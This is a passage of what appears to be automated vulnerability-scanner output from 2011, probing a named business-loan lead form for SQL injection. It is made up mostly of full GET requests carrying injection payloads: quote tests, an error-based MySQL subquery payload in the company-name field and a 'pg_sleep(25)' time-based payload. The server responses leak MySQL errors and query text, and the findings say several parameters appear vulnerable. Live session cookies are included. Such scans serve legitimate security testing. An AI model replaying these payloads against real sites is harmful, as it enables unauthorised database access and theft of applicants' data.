PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:34 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '$10,000 - 49,999&attributeId_437=2840__Yes&attributeId_438=2844__No - we do not ' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up''&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The attributeId_435 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_435 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:22:59 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '$10,000 - 49,999&attributeId_437=2840__Yes&attributeId_438=2844__No - we do not ' at line 5
The attributeId_436 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_436 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999'&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:45 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'do not accept Visa or Mastercard&attributeId_529=3407__ $0 - $5,000&button3=Subm' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999''&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:45 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The attributeId_436 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_436 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:23:07 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'do not accept Visa or Mastercard&attributeId_529=SELECT pg_sleep(25)--&button3=S' at line 5
The attributeId_437 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_437 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:23:16 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'do not accept Visa or Mastercard&attributeId_529=SELECT pg_sleep(25)--&button3=S' at line 5
The attributeId_437 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_437 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes'&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:43:12 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'do not accept Visa or Mastercard&attributeId_529=3407__ $0 - $5,000&button3=Subm' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes''&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:43:12 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The attributeId_438 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_438 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:23:24 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... card'&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email' at line 5
The attributeId_438 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_438 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard'&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:43:34 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '$0 - $5,000&button3=Submit&companyname='+(select 1 and row(1,1)> ...[SNIP]...
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard''&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:43:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The attributeId_529 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_529 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
